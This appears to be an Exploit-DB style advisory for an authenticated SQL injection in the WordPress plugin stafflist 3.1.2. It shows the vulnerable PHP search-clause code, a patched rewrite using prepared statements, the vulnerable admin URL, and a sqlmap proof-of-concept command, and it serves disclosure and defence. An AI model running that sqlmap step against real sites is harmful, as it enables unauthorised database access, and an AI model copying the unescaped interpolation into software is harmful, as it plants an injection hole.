Vendor: Stafflist
By: Hassan Khan Yusufzai - Splint3r7
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Stafflist
Affected Version From: 3.1.2002
Affected Version To: 3.1.2002
Patch Exists: NO
Related CWE:
CPE: a:wordpress:stafflist:3.1.2
Metasploit:
Other Scripts:
Platforms Tested: Firefox
Year: 2022

WordPress Plugin stafflist 3.1.2 – SQLi (Authenticated)

The vulnerability exists because user-supplied input in the 'search' parameter of the 'admin.php' script is not sanitized before it is used in a search query. A remote, authenticated attacker can execute arbitrary SQL commands against the application's database, cause a denial of service, access or modify sensitive data, or exploit vulnerabilities in the underlying SQL server software.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. All input data should be carefully verified before being used in SQL queries.

Exploit-DB raw data:

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

```php
// $w is taken from the 'search' GET parameter; the line that assigns it is elided
// in the advisory ("...").
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
	// $w is interpolated straight into the SQL string with no escaping or
	// parameter binding: the injection point of this advisory.
	$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
			LOWER(firstname) LIKE '%{$w}%' OR
			LOWER(department)  LIKE '%{$w}%' OR
			LOWER(email) LIKE '%{$w}%'" : "");
```
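For comparison, an added example (not the stafflist plugin's code and not part of the Exploit-DB entry) of the same WHERE clause built with WordPress's own `$wpdb->prepare()` and `$wpdb->esc_like()`, so the search value is bound as a quoted string literal instead of being interpolated. It assumes it runs inside WordPress with the global `$wpdb` loaded; the function name is hypothetical.

```php
<?php
// Added example, not the stafflist plugin's code: the search clause rebuilt
// with WordPress's $wpdb->prepare() and $wpdb->esc_like(), so the value from
// $_GET['search'] can only ever be a quoted string literal, never SQL.
// Assumes WordPress is loaded (global $wpdb available); function name is
// hypothetical.

/**
 * Return a safe WHERE fragment for the staff search, or '' when the search
 * box is empty (mirroring the original's ($w ? ... : "") logic).
 */
function stafflist_safe_search_where( wpdb $wpdb, $raw_search ) {
    // wp_unslash() removes the slashes WordPress adds to request data;
    // sanitize_text_field() strips tags and control characters. Neither is
    // the SQL defence; prepare() below is.
    $w = strtolower( trim( sanitize_text_field( wp_unslash( (string) $raw_search ) ) ) );
    if ( '' === $w ) {
        return '';
    }

    // esc_like() escapes %, _ and \ so the user's text cannot act as a
    // wildcard; the surrounding % wildcards are added by this code only.
    $like = '%' . $wpdb->esc_like( $w ) . '%';

    // prepare() quotes and escapes each %s value. Column names stay fixed in
    // the template, so nothing from the request reaches the SQL parser as SQL.
    return $wpdb->prepare(
        'WHERE LOWER(lastname) LIKE %s OR LOWER(firstname) LIKE %s'
        . ' OR LOWER(department) LIKE %s OR LOWER(email) LIKE %s',
        $like, $like, $like, $like
    );
}

// Usage in the admin page handler; $where is appended to the plugin's own
// SELECT exactly where the vulnerable version used its interpolated string.
$where = isset( $_GET['search'] )
    ? stafflist_safe_search_where( $wpdb, $_GET['search'] )
    : '';
```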


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' \
  --cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib